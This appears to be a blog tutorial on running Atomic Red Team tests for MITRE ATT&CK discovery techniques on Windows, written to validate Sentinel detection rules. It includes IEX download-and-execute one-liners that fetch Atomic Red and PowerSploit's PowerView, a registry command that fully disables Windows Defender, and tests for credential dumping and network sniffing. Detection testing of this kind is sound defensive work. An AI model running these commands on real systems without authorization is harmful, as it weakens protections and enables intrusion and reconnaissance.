Simulate Discovery Techniques on Windows via Atomic Red

M'hirsi Hamza
5 min readSep 29, 2023
Source

Hi Medium! Here we are again with a new article related to Sentinel, we will simulate different attacks and we will show you how we can detect them in the next articles that will come.

Src: https://github.com/redcanaryco/atomic-red-team

This article

We will show how we can test our SOC and the capabilities to detect different attacks, or also to build robust rules, we know that now we can import millions of rules but no promise that all of them works and we need to test them one by one to validate what rules are valid for our network and what not.

Atomic red is one of the best tools to run those tests, we will go through all parts needed to simulate different techniques listed in MITRE ATT&CK and try to detect them later on our Sentinel one by one.

This article will cover the following:

Install Atomic Red
- Import-Module
- Show test available for a given technique
- Check if prerequisites are available
- Completely disable Windows Defender
Executed technique on Discovery
- Account Discovery
- Application Window Discovery
- Browser Bookmark Discovery
- Domain Trust Discovery
- File and Directory Discovery
- Group Policy Discovery
- Network Service Scanning
- Network Share Discovery
- Network Sniffing
- Password Policy Discovery
- Peripheral Device Discovery
- Permission Groups Discovery
- Process Discovery
Conclusion

Install Atomic red

The installation is not that hard, you need a PowerShell core and a keyboard. To ease the process make sure to run it on Windows, we will go through the installation together no worries 😊

You can follow this link step by step and you will have the tool installed within a few minutes, one of the things to consider is to use that tool on your victim machine, so you have basically two options:

  • Install it and use it on the victim's machine
  • Install it on your machine and execute it on another machine by opening a session on the machine you want to test.

To Start

The Atomics Folder contains the test definitions; and the commands that the execution framework will execute. If you would like to install the atomics folder at the same time that you install the execution framework, you can do this by adding the -getAtomics switch during the installation of the execution framework:

IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing);
Install-AtomicRedTeam -getAtomics

BooM we are done, let apply some changes to have a smooth use of the tool.

Import-Module

We don’t want to import the modules each time we open PowerShell so we create a profile:

PS> notepad $profile

And we add those lines into the file:

Import-Module "C:\AtomicRedTeam\invoke-atomicredteam\Invoke-AtomicRedTeam.psd1" -Force
$PSDefaultParameterValues = @{"Invoke-AtomicTest:PathToAtomicsFolder"="C:\AtomicRedTeam\atomics"}

Then we can import the profile if needed, usually it will be imported by default:

PS> . $profile

Show test available for a given technique

Let’s test some commands to make sure that we are on the right track and we are missing nothing, also those commands will help you understand what you are running, if you face any issues please reach out to the Git page of the tool for further debugging.

Show brief details about a technique:

PS> Invoke-AtomicTest T1003 -ShowDetailsBrief

Show brief details about all techniques:

PS> Invoke-AtomicTest All -ShowDetailsBrief

Show details about a technique:

PS> Invoke-AtomicTest T1003 -ShowDetails

Check if prerequisites are available

For each technique, you will execute basically you will be calling a folder in the atomic red that will run multiple commands, and sometimes those commands need prerequisites that you need to install, I advise you to have a look at this folder and the MiTRE Technique to understand what you are running.

Check if we can run the technique on the machine:

PS> Invoke-AtomicTest T1003 -TestName "Windows Credential Editor" -CheckPrereqs
PS> Invoke-AtomicTest T1003 -CheckPrereqs

Satisfy the prerequisites:

PS> Invoke-AtomicTest T1003 -TestName "Windows Credential Editor" -GetPrereqs
PS> Invoke-AtomicTest T1003 -GetPrereqs

Execute all attacks for a given technique, you can run one by one or all of them, that depends of course on your needs:

PS> Invoke-AtomicTest T1218

Completely disable Windows Defender

Emmmm hahaha 😆, I don’t know what to say, but disabling this dude is sometimes needed, please use this carefully 😅

PS> New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force

Executed technique on Discovery

I used this link to check the available techniques, have a look, I promise it’s needed.

Some techniques are not represented in atomic red, so you need to check the technique on MiTRE and simulate it manually.

In the list below I will go through all the commands and techniques I needed to run discovery on my machine, for each technique I review it in MiTRE ATT&CK, and I will be attaching the links for the first techniques.

Account Discovery

PS> Invoke-AtomicTest T1087.001
PS> Invoke-AtomicTest T1087.002

https://attack.mitre.org/techniques/T1087/

Application Window Discovery

PS> Invoke-AtomicTest T1010

https://attack.mitre.org/techniques/T1010/

Browser Bookmark Discovery

PS> Invoke-AtomicTest T1217

Domain Trust Discovery

PS> Invoke-AtomicTest T1482

File and Directory Discovery

PS> Invoke-AtomicTest T1083

Group Policy Discovery

T1615 (Not Found) use command like gpresult, Get-DomainGPO and Get-DomainGPOLocalGroup

Resources: https://attack.mitre.org/techniques/T1615/

Network Service Scanning

Install Nmap and Python, use those scanning tools manually using different parameters to see the difference, and try to catch those scanning in your network logs, you can also use that command but you still need to install Python and Nmap for the prerequisites of this command:

PS> Invoke-AtomicTest T1046

Network Share Discovery

PS> Invoke-AtomicTest T1135

Network Sniffing

PS> Invoke-AtomicTest T1040

Password Policy Discovery

PS> Invoke-AtomicTest T1201

Peripheral Device Discovery

PS> Invoke-AtomicTest T1120

Permission Groups Discovery

PS> Invoke-AtomicTest T1069.001
PS> Invoke-AtomicTest T1069.002

For the following group discovery, you may need to run those commands:

T1069.002–4

PS> [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
PS> IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-LocalAdminAccess -Verbose

T1069.002–5

PS> [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
PS> IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-EnumerateLocalAdmin -Verbose

T1069.002–6

PS> [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
PS> IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-GPOComputerAdmin -ComputerName #{computer_name} -Verbose"

Process Discovery

T1424 (Not Found), you can simply use the ps command or others that you may prefer.

Resources: https://attack.mitre.org/techniques/T1424/

Conclusion

All those commands will help you run different discovery techniques and try to catch them on logs and on your alerts, but you need to take into consideration that attackers always try to

--

--

M'hirsi Hamza

Cyber Security Architect at Rakuten Symphony Deutschland, talks about #innovation, #technology, #cyberattack, #cyberdefense, and #cybersecurity